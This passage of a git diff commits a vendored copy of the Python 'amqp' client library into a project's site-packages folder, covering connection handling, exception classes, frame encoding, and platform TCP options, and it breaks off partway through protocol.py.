'ssl' parameter may be simply True/False, or + a dictionary of options to pass to :class:`ssl.SSLContext` such as + requiring certain certificates. For details, refer ``ssl`` parameter of + :class:`~amqp.transport.SSLTransport`. + + The "socket_settings" parameter is a dictionary defining tcp + settings which will be applied as socket options. + + When "confirm_publish" is set to True, the channel is put to + confirm mode. In this mode, each published message is + confirmed using Publisher confirms RabbitMQ extension. + """ + + Channel = Channel + + #: Mapping of protocol extensions to enable. + #: The server will report these in server_properties[capabilities], + #: and if a key in this map is present the client will tell the + #: server to either enable or disable the capability depending + #: on the value set in this map. + #: For example with: + #: negotiate_capabilities = { + #: 'consumer_cancel_notify': True, + #: } + #: The client will enable this capability if the server reports + #: support for it, but if the value is False the client will + #: disable the capability. + negotiate_capabilities = NEGOTIATE_CAPABILITIES + + #: These are sent to the server to announce what features + #: we support, type of client etc. + library_properties = LIBRARY_PROPERTIES + + #: Final heartbeat interval value (in float seconds) after negotiation + heartbeat = None + + #: Original heartbeat interval value proposed by client. + client_heartbeat = None + + #: Original heartbeat interval proposed by server. + server_heartbeat = None + + #: Time of last heartbeat sent (in monotonic time, if available). + last_heartbeat_sent = 0 + + #: Time of last heartbeat received (in monotonic time, if available). + last_heartbeat_received = 0 + + #: Number of successful writes to socket. + bytes_sent = 0 + + #: Number of successful reads from socket. + bytes_recv = 0 + + #: Number of bytes sent to socket at the last heartbeat check. + prev_sent = None + + #: Number of bytes received from socket at the last heartbeat check. + prev_recv = None + + _METHODS = { + spec.method(spec.Connection.Start, 'ooFSS'), + spec.method(spec.Connection.OpenOk), + spec.method(spec.Connection.Secure, 's'), + spec.method(spec.Connection.Tune, 'BlB'), + spec.method(spec.Connection.Close, 'BsBB'), + spec.method(spec.Connection.Blocked), + spec.method(spec.Connection.Unblocked), + spec.method(spec.Connection.CloseOk), + } + _METHODS = {m.method_sig: m for m in _METHODS} + + _ALLOWED_METHODS_WHEN_CLOSING = ( + spec.Connection.Close, spec.Connection.CloseOk + ) + + connection_errors = ( + ConnectionError, + socket.error, + IOError, + OSError, + ) + channel_errors = (ChannelError,) + recoverable_connection_errors = ( + RecoverableConnectionError, + socket.error, + IOError, + OSError, + ) + recoverable_channel_errors = ( + RecoverableChannelError, + ) + + def __init__(self, host='localhost:5672', userid='guest', password='guest', + login_method=None, login_response=None, + authentication=(), + virtual_host='/', locale='en_US', client_properties=None, + ssl=False, connect_timeout=None, channel_max=None, + frame_max=None, heartbeat=0, on_open=None, on_blocked=None, + on_unblocked=None, confirm_publish=False, + on_tune_ok=None, read_timeout=None, write_timeout=None, + socket_settings=None, frame_handler=frame_handler, + frame_writer=frame_writer, **kwargs): + self._connection_id = uuid.uuid4().hex + channel_max = channel_max or 65535 + frame_max = frame_max or 131072 + if authentication: + if isinstance(authentication, sasl.SASL): + authentication = (authentication,) + self.authentication = authentication + elif login_method is not None: + if login_method == 'GSSAPI': + auth = sasl.GSSAPI(userid) + elif login_method == 'EXTERNAL': + auth = sasl.EXTERNAL() + elif login_method == 'AMQPLAIN': + if userid is None or password is None: + raise ValueError( + "Must supply authentication or userid/password") + auth = sasl.AMQPLAIN(userid, password) + elif login_method == 'PLAIN': + if userid is None or password is None: + raise ValueError( + "Must supply authentication or userid/password") + auth = sasl.PLAIN(userid, password) + elif login_response is not None: + auth = sasl.RAW(login_method, login_response) + else: + raise ValueError("Invalid login method", login_method) + self.authentication = (auth,) + else: + self.authentication = (sasl.GSSAPI(userid, fail_soft=True), + sasl.EXTERNAL(), + sasl.AMQPLAIN(userid, password), + sasl.PLAIN(userid, password)) + + self.client_properties = dict( + self.library_properties, **client_properties or {} + ) + self.locale = locale + self.host = host + self.virtual_host = virtual_host + self.on_tune_ok = ensure_promise(on_tune_ok) + + self.frame_handler_cls = frame_handler + self.frame_writer_cls = frame_writer + + self._handshake_complete = False + + self.channels = {} + # The connection object itself is treated as channel 0 + super().__init__(self, 0) + + self._frame_writer = None + self._on_inbound_frame = None + self._transport = None + + # Properties set in the Tune method + self.channel_max = channel_max + self.frame_max = frame_max + self.client_heartbeat = heartbeat + + self.confirm_publish = confirm_publish + self.ssl = ssl + self.read_timeout = read_timeout + self.write_timeout = write_timeout + self.socket_settings = socket_settings + + # Callbacks + self.on_blocked = on_blocked + self.on_unblocked = on_unblocked + self.on_open = ensure_promise(on_open) + + self._used_channel_ids = array('H') + + # Properties set in the Start method + self.version_major = 0 + self.version_minor = 0 + self.server_properties = {} + self.mechanisms = [] + self.locales = [] + + self.connect_timeout = connect_timeout + + def __repr__(self): + if self._transport: + return f'' + else: + return f'' + + def __enter__(self): + self.connect() + return self + + def __exit__(self, *eargs): + self.close() + + def then(self, on_success, on_error=None): + return self.on_open.then(on_success, on_error) + + def _setup_listeners(self): + self._callbacks.update({ + spec.Connection.Start: self._on_start, + spec.Connection.OpenOk: self._on_open_ok, + spec.Connection.Secure: self._on_secure, + spec.Connection.Tune: self._on_tune, + spec.Connection.Close: self._on_close, + spec.Connection.Blocked: self._on_blocked, + spec.Connection.Unblocked: self._on_unblocked, + spec.Connection.CloseOk: self._on_close_ok, + }) + + def connect(self, callback=None): + # Let the transport.py module setup the actual + # socket connection to the broker. + # + if self.connected: + return callback() if callback else None + try: + self.transport = self.Transport( + self.host, self.connect_timeout, self.ssl, + self.read_timeout, self.write_timeout, + socket_settings=self.socket_settings, + ) + self.transport.connect() + self.on_inbound_frame = self.frame_handler_cls( + self, self.on_inbound_method) + self.frame_writer = self.frame_writer_cls(self, self.transport) + + while not self._handshake_complete: + self.drain_events(timeout=self.connect_timeout) + + except (OSError, SSLError): + self.collect() + raise + + def _warn_force_connect(self, attr): + warnings.warn(AMQPDeprecationWarning( + W_FORCE_CONNECT.format(attr=attr))) + + @property + def transport(self): + if self._transport is None: + self._warn_force_connect('transport') + self.connect() + return self._transport + + @transport.setter + def transport(self, transport): + self._transport = transport + + @property + def on_inbound_frame(self): + if self._on_inbound_frame is None: + self._warn_force_connect('on_inbound_frame') + self.connect() + return self._on_inbound_frame + + @on_inbound_frame.setter + def on_inbound_frame(self, on_inbound_frame): + self._on_inbound_frame = on_inbound_frame + + @property + def frame_writer(self): + if self._frame_writer is None: + self._warn_force_connect('frame_writer') + self.connect() + return self._frame_writer + + @frame_writer.setter + def frame_writer(self, frame_writer): + self._frame_writer = frame_writer + + def _on_start(self, version_major, version_minor, server_properties, + mechanisms, locales, argsig='FsSs'): + client_properties = self.client_properties + self.version_major = version_major + self.version_minor = version_minor + self.server_properties = server_properties + if isinstance(mechanisms, str): + mechanisms = mechanisms.encode('utf-8') + self.mechanisms = mechanisms.split(b' ') + self.locales = locales.split(' ') + AMQP_LOGGER.debug( + START_DEBUG_FMT, + self.version_major, self.version_minor, + self.server_properties, self.mechanisms, self.locales, + ) + + # Negotiate protocol extensions (capabilities) + scap = server_properties.get('capabilities') or {} + cap = client_properties.setdefault('capabilities', {}) + cap.update({ + wanted_cap: enable_cap + for wanted_cap, enable_cap in self.negotiate_capabilities.items() + if scap.get(wanted_cap) + }) + if not cap: + # no capabilities, server may not react well to having + # this key present in client_properties, so we remove it. + client_properties.pop('capabilities', None) + + for authentication in self.authentication: + if authentication.mechanism in self.mechanisms: + login_response = authentication.start(self) + if login_response is not NotImplemented: + break + else: + raise ConnectionError( + "Couldn't find appropriate auth mechanism " + "(can offer: {}; available: {})".format( + b", ".join(m.mechanism + for m in self.authentication + if m.mechanism).decode(), + b", ".join(self.mechanisms).decode())) + + self.send_method( + spec.Connection.StartOk, argsig, + (client_properties, authentication.mechanism, + login_response, self.locale), + ) + + def _on_secure(self, challenge): + pass + + def _on_tune(self, channel_max, frame_max, server_heartbeat, argsig='BlB'): + client_heartbeat = self.client_heartbeat or 0 + self.channel_max = channel_max or self.channel_max + self.frame_max = frame_max or self.frame_max + self.server_heartbeat = server_heartbeat or 0 + + # negotiate the heartbeat interval to the smaller of the + # specified values + if self.server_heartbeat == 0 or client_heartbeat == 0: + self.heartbeat = max(self.server_heartbeat, client_heartbeat) + else: + self.heartbeat = min(self.server_heartbeat, client_heartbeat) + + # Ignore server heartbeat if client_heartbeat is disabled + if not self.client_heartbeat: + self.heartbeat = 0 + + self.send_method( + spec.Connection.TuneOk, argsig, + (self.channel_max, self.frame_max, self.heartbeat), + callback=self._on_tune_sent, + ) + + def _on_tune_sent(self, argsig='ssb'): + self.send_method( + spec.Connection.Open, argsig, (self.virtual_host, '', False), + ) + + def _on_open_ok(self): + self._handshake_complete = True + self.on_open(self) + + def Transport(self, host, connect_timeout, + ssl=False, read_timeout=None, write_timeout=None, + socket_settings=None, **kwargs): + return Transport( + host, connect_timeout=connect_timeout, ssl=ssl, + read_timeout=read_timeout, write_timeout=write_timeout, + socket_settings=socket_settings, **kwargs) + + @property + def connected(self): + return self._transport and self._transport.connected + + def collect(self): + if self._transport: + self._transport.close() + + if self.channels: + # Copy all the channels except self since the channels + # dictionary changes during the collection process. + channels = [ + ch for ch in self.channels.values() + if ch is not self + ] + + for ch in channels: + ch.collect() + self._transport = self.connection = self.channels = None + + def _get_free_channel_id(self): + # Cast to a set for fast lookups, and keep stored as an array for lower memory usage. + used_channel_ids = set(self._used_channel_ids) + + for channel_id in range(1, self.channel_max + 1): + if channel_id not in used_channel_ids: + self._used_channel_ids.append(channel_id) + return channel_id + + raise ResourceError( + 'No free channel ids, current={}, channel_max={}'.format( + len(self.channels), self.channel_max), spec.Channel.Open) + + def _claim_channel_id(self, channel_id): + if channel_id in self._used_channel_ids: + raise ConnectionError(f'Channel {channel_id!r} already open') + else: + self._used_channel_ids.append(channel_id) + return channel_id + + def channel(self, channel_id=None, callback=None): + """Create new channel. + + Fetch a Channel object identified by the numeric channel_id, or + create that object if it doesn't already exist. + """ + if self.channels is None: + raise RecoverableConnectionError('Connection already closed.') + + try: + return self.channels[channel_id] + except KeyError: + channel = self.Channel(self, channel_id, on_open=callback) + channel.open() + return channel + + def is_alive(self): + raise NotImplementedError('Use AMQP heartbeats') + + def drain_events(self, timeout=None): + # read until message is ready + while not self.blocking_read(timeout): + pass + + def blocking_read(self, timeout=None): + with self.transport.having_timeout(timeout): + frame = self.transport.read_frame() + return self.on_inbound_frame(frame) + + def on_inbound_method(self, channel_id, method_sig, payload, content): + if self.channels is None: + raise RecoverableConnectionError('Connection already closed') + + return self.channels[channel_id].dispatch_method( + method_sig, payload, content, + ) + + def close(self, reply_code=0, reply_text='', method_sig=(0, 0), + argsig='BsBB'): + """Request a connection close. + + This method indicates that the sender wants to close the + connection. This may be due to internal conditions (e.g. a + forced shut-down) or due to an error handling a specific + method, i.e. an exception. When a close is due to an + exception, the sender provides the class and method id of the + method which caused the exception. + + RULE: + + After sending this method any received method except the + Close-OK method MUST be discarded. + + RULE: + + The peer sending this method MAY use a counter or timeout + to detect failure of the other peer to respond correctly + with the Close-OK method. + + RULE: + + When a server receives the Close method from a client it + MUST delete all server-side resources associated with the + client's context. A client CANNOT reconnect to a context + after sending or receiving a Close method. + + PARAMETERS: + reply_code: short + + The reply code. The AMQ reply codes are defined in AMQ + RFC 011. + + reply_text: shortstr + + The localised reply text. This text can be logged as an + aid to resolving issues. + + class_id: short + + failing method class + + When the close is provoked by a method exception, this + is the class of the method. + + method_id: short + + failing method ID + + When the close is provoked by a method exception, this + is the ID of the method. + """ + if self._transport is None: + # already closed + return + + try: + self.is_closing = True + return self.send_method( + spec.Connection.Close, argsig, + (reply_code, reply_text, method_sig[0], method_sig[1]), + wait=spec.Connection.CloseOk, + ) + except (OSError, SSLError): + # close connection + self.collect() + raise + finally: + self.is_closing = False + + def _on_close(self, reply_code, reply_text, class_id, method_id): + """Request a connection close. + + This method indicates that the sender wants to close the + connection. This may be due to internal conditions (e.g. a + forced shut-down) or due to an error handling a specific + method, i.e. an exception. When a close is due to an + exception, the sender provides the class and method id of the + method which caused the exception. + + RULE: + + After sending this method any received method except the + Close-OK method MUST be discarded. + + RULE: + + The peer sending this method MAY use a counter or timeout + to detect failure of the other peer to respond correctly + with the Close-OK method. + + RULE: + + When a server receives the Close method from a client it + MUST delete all server-side resources associated with the + client's context. A client CANNOT reconnect to a context + after sending or receiving a Close method. + + PARAMETERS: + reply_code: short + + The reply code. The AMQ reply codes are defined in AMQ + RFC 011. + + reply_text: shortstr + + The localised reply text. This text can be logged as an + aid to resolving issues. + + class_id: short + + failing method class + + When the close is provoked by a method exception, this + is the class of the method. + + method_id: short + + failing method ID + + When the close is provoked by a method exception, this + is the ID of the method. + """ + self._x_close_ok() + raise error_for_code(reply_code, reply_text, + (class_id, method_id), ConnectionError) + + def _x_close_ok(self): + """Confirm a connection close. + + This method confirms a Connection.Close method and tells the + recipient that it is safe to release resources for the + connection and close the socket. + + RULE: + A peer that detects a socket closure without having + received a Close-Ok handshake method SHOULD log the error. + """ + self.send_method(spec.Connection.CloseOk, callback=self._on_close_ok) + + def _on_close_ok(self): + """Confirm a connection close. + + This method confirms a Connection.Close method and tells the + recipient that it is safe to release resources for the + connection and close the socket. + + RULE: + + A peer that detects a socket closure without having + received a Close-Ok handshake method SHOULD log the error. + """ + self.collect() + + def _on_blocked(self): + """Callback called when connection blocked. + + Notes: + This is an RabbitMQ Extension. + """ + reason = 'connection blocked, see broker logs' + if self.on_blocked: + return self.on_blocked(reason) + + def _on_unblocked(self): + if self.on_unblocked: + return self.on_unblocked() + + def send_heartbeat(self): + self.frame_writer(8, 0, None, None, None) + + def heartbeat_tick(self, rate=2): + """Send heartbeat packets if necessary. + + Raises: + ~amqp.exceptions.ConnectionForvced: if none have been + received recently. + + Note: + This should be called frequently, on the order of + once per second. + + Keyword Arguments: + rate (int): Previously used, but ignored now. + """ + AMQP_HEARTBEAT_LOGGER.debug('heartbeat_tick : for connection %s', + self._connection_id) + if not self.heartbeat: + return + + # treat actual data exchange in either direction as a heartbeat + sent_now = self.bytes_sent + recv_now = self.bytes_recv + if self.prev_sent is None or self.prev_sent != sent_now: + self.last_heartbeat_sent = monotonic() + if self.prev_recv is None or self.prev_recv != recv_now: + self.last_heartbeat_received = monotonic() + + now = monotonic() + AMQP_HEARTBEAT_LOGGER.debug( + 'heartbeat_tick : Prev sent/recv: %s/%s, ' + 'now - %s/%s, monotonic - %s, ' + 'last_heartbeat_sent - %s, heartbeat int. - %s ' + 'for connection %s', + self.prev_sent, self.prev_recv, + sent_now, recv_now, now, + self.last_heartbeat_sent, + self.heartbeat, + self._connection_id, + ) + + self.prev_sent, self.prev_recv = sent_now, recv_now + + # send a heartbeat if it's time to do so + if now > self.last_heartbeat_sent + self.heartbeat: + AMQP_HEARTBEAT_LOGGER.debug( + 'heartbeat_tick: sending heartbeat for connection %s', + self._connection_id) + self.send_heartbeat() + self.last_heartbeat_sent = monotonic() + + # if we've missed two intervals' heartbeats, fail; this gives the + # server enough time to send heartbeats a little late + two_heartbeats = 2 * self.heartbeat + two_heartbeats_interval = self.last_heartbeat_received + two_heartbeats + heartbeats_missed = two_heartbeats_interval < monotonic() + if self.last_heartbeat_received and heartbeats_missed: + raise ConnectionForced('Too many heartbeats missed') + + @property + def sock(self): + return self.transport.sock + + @property + def server_capabilities(self): + return self.server_properties.get('capabilities') or {} diff --git a/env/Lib/site-packages/amqp/exceptions.py b/env/Lib/site-packages/amqp/exceptions.py new file mode 100644 index 00000000..0098dba9 --- /dev/null +++ b/env/Lib/site-packages/amqp/exceptions.py @@ -0,0 +1,288 @@ +"""Exceptions used by amqp.""" +# Copyright (C) 2007-2008 Barry Pederson + +from struct import pack, unpack + +__all__ = ( + 'AMQPError', + 'ConnectionError', 'ChannelError', + 'RecoverableConnectionError', 'IrrecoverableConnectionError', + 'RecoverableChannelError', 'IrrecoverableChannelError', + 'ConsumerCancelled', 'ContentTooLarge', 'NoConsumers', + 'ConnectionForced', 'InvalidPath', 'AccessRefused', 'NotFound', + 'ResourceLocked', 'PreconditionFailed', 'FrameError', 'FrameSyntaxError', + 'InvalidCommand', 'ChannelNotOpen', 'UnexpectedFrame', 'ResourceError', + 'NotAllowed', 'AMQPNotImplementedError', 'InternalError', + 'MessageNacked', + 'AMQPDeprecationWarning', +) + + +class AMQPDeprecationWarning(UserWarning): + """Warning for deprecated things.""" + + +class MessageNacked(Exception): + """Message was nacked by broker.""" + + +class AMQPError(Exception): + """Base class for all AMQP exceptions.""" + + code = 0 + + def __init__(self, reply_text=None, method_sig=None, + method_name=None, reply_code=None): + self.message = reply_text + self.reply_code = reply_code or self.code + self.reply_text = reply_text + self.method_sig = method_sig + self.method_name = method_name or '' + if method_sig and not self.method_name: + self.method_name = METHOD_NAME_MAP.get(method_sig, '') + Exception.__init__(self, reply_code, + reply_text, method_sig, self.method_name) + + def __str__(self): + if self.method: + return '{0.method}: ({0.reply_code}) {0.reply_text}'.format(self) + return self.reply_text or '<{}: unknown error>'.format( + type(self).__name__ + ) + + @property + def method(self): + return self.method_name or self.method_sig + + +class ConnectionError(AMQPError): + """AMQP Connection Error.""" + + +class ChannelError(AMQPError): + """AMQP Channel Error.""" + + +class RecoverableChannelError(ChannelError): + """Exception class for recoverable channel errors.""" + + +class IrrecoverableChannelError(ChannelError): + """Exception class for irrecoverable channel errors.""" + + +class RecoverableConnectionError(ConnectionError): + """Exception class for recoverable connection errors.""" + + +class IrrecoverableConnectionError(ConnectionError): + """Exception class for irrecoverable connection errors.""" + + +class Blocked(RecoverableConnectionError): + """AMQP Connection Blocked Predicate.""" + + +class ConsumerCancelled(RecoverableConnectionError): + """AMQP Consumer Cancelled Predicate.""" + + +class ContentTooLarge(RecoverableChannelError): + """AMQP Content Too Large Error.""" + + code = 311 + + +class NoConsumers(RecoverableChannelError): + """AMQP No Consumers Error.""" + + code = 313 + + +class ConnectionForced(RecoverableConnectionError): + """AMQP Connection Forced Error.""" + + code = 320 + + +class InvalidPath(IrrecoverableConnectionError): + """AMQP Invalid Path Error.""" + + code = 402 + + +class AccessRefused(IrrecoverableChannelError): + """AMQP Access Refused Error.""" + + code = 403 + + +class NotFound(IrrecoverableChannelError): + """AMQP Not Found Error.""" + + code = 404 + + +class ResourceLocked(RecoverableChannelError): + """AMQP Resource Locked Error.""" + + code = 405 + + +class PreconditionFailed(IrrecoverableChannelError): + """AMQP Precondition Failed Error.""" + + code = 406 + + +class FrameError(IrrecoverableConnectionError): + """AMQP Frame Error.""" + + code = 501 + + +class FrameSyntaxError(IrrecoverableConnectionError): + """AMQP Frame Syntax Error.""" + + code = 502 + + +class InvalidCommand(IrrecoverableConnectionError): + """AMQP Invalid Command Error.""" + + code = 503 + + +class ChannelNotOpen(IrrecoverableConnectionError): + """AMQP Channel Not Open Error.""" + + code = 504 + + +class UnexpectedFrame(IrrecoverableConnectionError): + """AMQP Unexpected Frame.""" + + code = 505 + + +class ResourceError(RecoverableConnectionError): + """AMQP Resource Error.""" + + code = 506 + + +class NotAllowed(IrrecoverableConnectionError): + """AMQP Not Allowed Error.""" + + code = 530 + + +class AMQPNotImplementedError(IrrecoverableConnectionError): + """AMQP Not Implemented Error.""" + + code = 540 + + +class InternalError(IrrecoverableConnectionError): + """AMQP Internal Error.""" + + code = 541 + + +ERROR_MAP = { + 311: ContentTooLarge, + 313: NoConsumers, + 320: ConnectionForced, + 402: InvalidPath, + 403: AccessRefused, + 404: NotFound, + 405: ResourceLocked, + 406: PreconditionFailed, + 501: FrameError, + 502: FrameSyntaxError, + 503: InvalidCommand, + 504: ChannelNotOpen, + 505: UnexpectedFrame, + 506: ResourceError, + 530: NotAllowed, + 540: AMQPNotImplementedError, + 541: InternalError, +} + + +def error_for_code(code, text, method, default): + try: + return ERROR_MAP[code](text, method, reply_code=code) + except KeyError: + return default(text, method, reply_code=code) + + +METHOD_NAME_MAP = { + (10, 10): 'Connection.start', + (10, 11): 'Connection.start_ok', + (10, 20): 'Connection.secure', + (10, 21): 'Connection.secure_ok', + (10, 30): 'Connection.tune', + (10, 31): 'Connection.tune_ok', + (10, 40): 'Connection.open', + (10, 41): 'Connection.open_ok', + (10, 50): 'Connection.close', + (10, 51): 'Connection.close_ok', + (20, 10): 'Channel.open', + (20, 11): 'Channel.open_ok', + (20, 20): 'Channel.flow', + (20, 21): 'Channel.flow_ok', + (20, 40): 'Channel.close', + (20, 41): 'Channel.close_ok', + (30, 10): 'Access.request', + (30, 11): 'Access.request_ok', + (40, 10): 'Exchange.declare', + (40, 11): 'Exchange.declare_ok', + (40, 20): 'Exchange.delete', + (40, 21): 'Exchange.delete_ok', + (40, 30): 'Exchange.bind', + (40, 31): 'Exchange.bind_ok', + (40, 40): 'Exchange.unbind', + (40, 41): 'Exchange.unbind_ok', + (50, 10): 'Queue.declare', + (50, 11): 'Queue.declare_ok', + (50, 20): 'Queue.bind', + (50, 21): 'Queue.bind_ok', + (50, 30): 'Queue.purge', + (50, 31): 'Queue.purge_ok', + (50, 40): 'Queue.delete', + (50, 41): 'Queue.delete_ok', + (50, 50): 'Queue.unbind', + (50, 51): 'Queue.unbind_ok', + (60, 10): 'Basic.qos', + (60, 11): 'Basic.qos_ok', + (60, 20): 'Basic.consume', + (60, 21): 'Basic.consume_ok', + (60, 30): 'Basic.cancel', + (60, 31): 'Basic.cancel_ok', + (60, 40): 'Basic.publish', + (60, 50): 'Basic.return', + (60, 60): 'Basic.deliver', + (60, 70): 'Basic.get', + (60, 71): 'Basic.get_ok', + (60, 72): 'Basic.get_empty', + (60, 80): 'Basic.ack', + (60, 90): 'Basic.reject', + (60, 100): 'Basic.recover_async', + (60, 110): 'Basic.recover', + (60, 111): 'Basic.recover_ok', + (60, 120): 'Basic.nack', + (90, 10): 'Tx.select', + (90, 11): 'Tx.select_ok', + (90, 20): 'Tx.commit', + (90, 21): 'Tx.commit_ok', + (90, 30): 'Tx.rollback', + (90, 31): 'Tx.rollback_ok', + (85, 10): 'Confirm.select', + (85, 11): 'Confirm.select_ok', +} + + +for _method_id, _method_name in list(METHOD_NAME_MAP.items()): + METHOD_NAME_MAP[unpack('>I', pack('>HH', *_method_id))[0]] = \ + _method_name diff --git a/env/Lib/site-packages/amqp/method_framing.py b/env/Lib/site-packages/amqp/method_framing.py new file mode 100644 index 00000000..6c49833f --- /dev/null +++ b/env/Lib/site-packages/amqp/method_framing.py @@ -0,0 +1,189 @@ +"""Convert between frames and higher-level AMQP methods.""" +# Copyright (C) 2007-2008 Barry Pederson + +from collections import defaultdict +from struct import pack, pack_into, unpack_from + +from . import spec +from .basic_message import Message +from .exceptions import UnexpectedFrame +from .utils import str_to_bytes + +__all__ = ('frame_handler', 'frame_writer') + +#: Set of methods that require both a content frame and a body frame. +_CONTENT_METHODS = frozenset([ + spec.Basic.Return, + spec.Basic.Deliver, + spec.Basic.GetOk, +]) + + +#: Number of bytes reserved for protocol in a content frame. +#: We use this to calculate when a frame exceeeds the max frame size, +#: and if it does not the message will fit into the preallocated buffer. +FRAME_OVERHEAD = 40 + + +def frame_handler(connection, callback, + unpack_from=unpack_from, content_methods=_CONTENT_METHODS): + """Create closure that reads frames.""" + expected_types = defaultdict(lambda: 1) + partial_messages = {} + + def on_frame(frame): + frame_type, channel, buf = frame + connection.bytes_recv += 1 + if frame_type not in (expected_types[channel], 8): + raise UnexpectedFrame( + 'Received frame {} while expecting type: {}'.format( + frame_type, expected_types[channel]), + ) + elif frame_type == 1: + method_sig = unpack_from('>HH', buf, 0) + + if method_sig in content_methods: + # Save what we've got so far and wait for the content-header + partial_messages[channel] = Message( + frame_method=method_sig, frame_args=buf, + ) + expected_types[channel] = 2 + return False + + callback(channel, method_sig, buf, None) + + elif frame_type == 2: + msg = partial_messages[channel] + msg.inbound_header(buf) + + if not msg.ready: + # wait for the content-body + expected_types[channel] = 3 + return False + + # bodyless message, we're done + expected_types[channel] = 1 + partial_messages.pop(channel, None) + callback(channel, msg.frame_method, msg.frame_args, msg) + + elif frame_type == 3: + msg = partial_messages[channel] + msg.inbound_body(buf) + if not msg.ready: + # wait for the rest of the content-body + return False + expected_types[channel] = 1 + partial_messages.pop(channel, None) + callback(channel, msg.frame_method, msg.frame_args, msg) + elif frame_type == 8: + # bytes_recv already updated + return False + return True + + return on_frame + + +class Buffer: + def __init__(self, buf): + self.buf = buf + + @property + def buf(self): + return self._buf + + @buf.setter + def buf(self, buf): + self._buf = buf + # Using a memoryview allows slicing without copying underlying data. + # Slicing this is much faster than slicing the bytearray directly. + # More details: https://stackoverflow.com/a/34257357 + self.view = memoryview(buf) + + +def frame_writer(connection, transport, + pack=pack, pack_into=pack_into, range=range, len=len, + bytes=bytes, str_to_bytes=str_to_bytes, text_t=str): + """Create closure that writes frames.""" + write = transport.write + + buffer_store = Buffer(bytearray(connection.frame_max - 8)) + + def write_frame(type_, channel, method_sig, args, content): + chunk_size = connection.frame_max - 8 + offset = 0 + properties = None + args = str_to_bytes(args) + if content: + body = content.body + if isinstance(body, str): + encoding = content.properties.setdefault( + 'content_encoding', 'utf-8') + body = body.encode(encoding) + properties = content._serialize_properties() + bodylen = len(body) + properties_len = len(properties) or 0 + framelen = len(args) + properties_len + bodylen + FRAME_OVERHEAD + bigbody = framelen > chunk_size + else: + body, bodylen, bigbody = None, 0, 0 + + if bigbody: + # ## SLOW: string copy and write for every frame + frame = (b''.join([pack('>HH', *method_sig), args]) + if type_ == 1 else b'') # encode method frame + framelen = len(frame) + write(pack('>BHI%dsB' % framelen, + type_, channel, framelen, frame, 0xce)) + if body: + frame = b''.join([ + pack('>HHQ', method_sig[0], 0, len(body)), + properties, + ]) + framelen = len(frame) + write(pack('>BHI%dsB' % framelen, + 2, channel, framelen, frame, 0xce)) + + for i in range(0, bodylen, chunk_size): + frame = body[i:i + chunk_size] + framelen = len(frame) + write(pack('>BHI%dsB' % framelen, + 3, channel, framelen, + frame, 0xce)) + + else: + # frame_max can be updated via connection._on_tune. If + # it became larger, then we need to resize the buffer + # to prevent overflow. + if chunk_size > len(buffer_store.buf): + buffer_store.buf = bytearray(chunk_size) + buf = buffer_store.buf + + # ## FAST: pack into buffer and single write + frame = (b''.join([pack('>HH', *method_sig), args]) + if type_ == 1 else b'') + framelen = len(frame) + pack_into('>BHI%dsB' % framelen, buf, offset, + type_, channel, framelen, frame, 0xce) + offset += 8 + framelen + if body is not None: + frame = b''.join([ + pack('>HHQ', method_sig[0], 0, len(body)), + properties, + ]) + framelen = len(frame) + + pack_into('>BHI%dsB' % framelen, buf, offset, + 2, channel, framelen, frame, 0xce) + offset += 8 + framelen + + bodylen = len(body) + if bodylen > 0: + framelen = bodylen + pack_into('>BHI%dsB' % framelen, buf, offset, + 3, channel, framelen, body, 0xce) + offset += 8 + framelen + + write(buffer_store.view[:offset]) + + connection.bytes_sent += 1 + return write_frame diff --git a/env/Lib/site-packages/amqp/platform.py b/env/Lib/site-packages/amqp/platform.py new file mode 100644 index 00000000..6f6c6f3d --- /dev/null +++ b/env/Lib/site-packages/amqp/platform.py @@ -0,0 +1,79 @@ +"""Platform compatibility.""" + +import platform +import re +import sys +# Jython does not have this attribute +import typing + +try: + from socket import SOL_TCP +except ImportError: # pragma: no cover + from socket import IPPROTO_TCP as SOL_TCP # noqa + + +RE_NUM = re.compile(r'(\d+).+') + + +def _linux_version_to_tuple(s: str) -> typing.Tuple[int, int, int]: + return tuple(map(_versionatom, s.split('.')[:3])) + + +def _versionatom(s: str) -> int: + if s.isdigit(): + return int(s) + match = RE_NUM.match(s) + return int(match.groups()[0]) if match else 0 + + +# available socket options for TCP level +KNOWN_TCP_OPTS = { + 'TCP_CORK', 'TCP_DEFER_ACCEPT', 'TCP_KEEPCNT', + 'TCP_KEEPIDLE', 'TCP_KEEPINTVL', 'TCP_LINGER2', + 'TCP_MAXSEG', 'TCP_NODELAY', 'TCP_QUICKACK', + 'TCP_SYNCNT', 'TCP_USER_TIMEOUT', 'TCP_WINDOW_CLAMP', +} + +LINUX_VERSION = None +if sys.platform.startswith('linux'): + LINUX_VERSION = _linux_version_to_tuple(platform.release()) + if LINUX_VERSION < (2, 6, 37): + KNOWN_TCP_OPTS.remove('TCP_USER_TIMEOUT') + + # Windows Subsystem for Linux is an edge-case: the Python socket library + # returns most TCP_* enums, but they aren't actually supported + if platform.release().endswith("Microsoft"): + KNOWN_TCP_OPTS = {'TCP_NODELAY', 'TCP_KEEPIDLE', 'TCP_KEEPINTVL', + 'TCP_KEEPCNT'} + +elif sys.platform.startswith('darwin'): + KNOWN_TCP_OPTS.remove('TCP_USER_TIMEOUT') + +elif 'bsd' in sys.platform: + KNOWN_TCP_OPTS.remove('TCP_USER_TIMEOUT') + +# According to MSDN Windows platforms support getsockopt(TCP_MAXSSEG) but not +# setsockopt(TCP_MAXSEG) on IPPROTO_TCP sockets. +elif sys.platform.startswith('win'): + KNOWN_TCP_OPTS = {'TCP_NODELAY'} + +elif sys.platform.startswith('cygwin'): + KNOWN_TCP_OPTS = {'TCP_NODELAY'} + + # illumos does not allow to set the TCP_MAXSEG socket option, + # even if the Oracle documentation says otherwise. + # TCP_USER_TIMEOUT does not exist on Solaris 11.4 +elif sys.platform.startswith('sunos'): + KNOWN_TCP_OPTS.remove('TCP_MAXSEG') + KNOWN_TCP_OPTS.remove('TCP_USER_TIMEOUT') + +# aix does not allow to set the TCP_MAXSEG +# or the TCP_USER_TIMEOUT socket options. +elif sys.platform.startswith('aix'): + KNOWN_TCP_OPTS.remove('TCP_MAXSEG') + KNOWN_TCP_OPTS.remove('TCP_USER_TIMEOUT') +__all__ = ( + 'LINUX_VERSION', + 'SOL_TCP', + 'KNOWN_TCP_OPTS', +) diff --git a/env/Lib/site-packages/amqp/protocol.py b/env/Lib/site-packages/amqp/protocol.py new file mode 100644 index 00000000..b58d5c96 --- /dev/null +++ b/env/Lib/site-packages/amqp/protocol.py @@ -0,0 +1,12 @@ +"""Protocol data.""" + +from collections import namedtuple + +queue_declare_ok_t = namedtuple( + 'queue_declare_ok_t', ('queue', 'message_count', 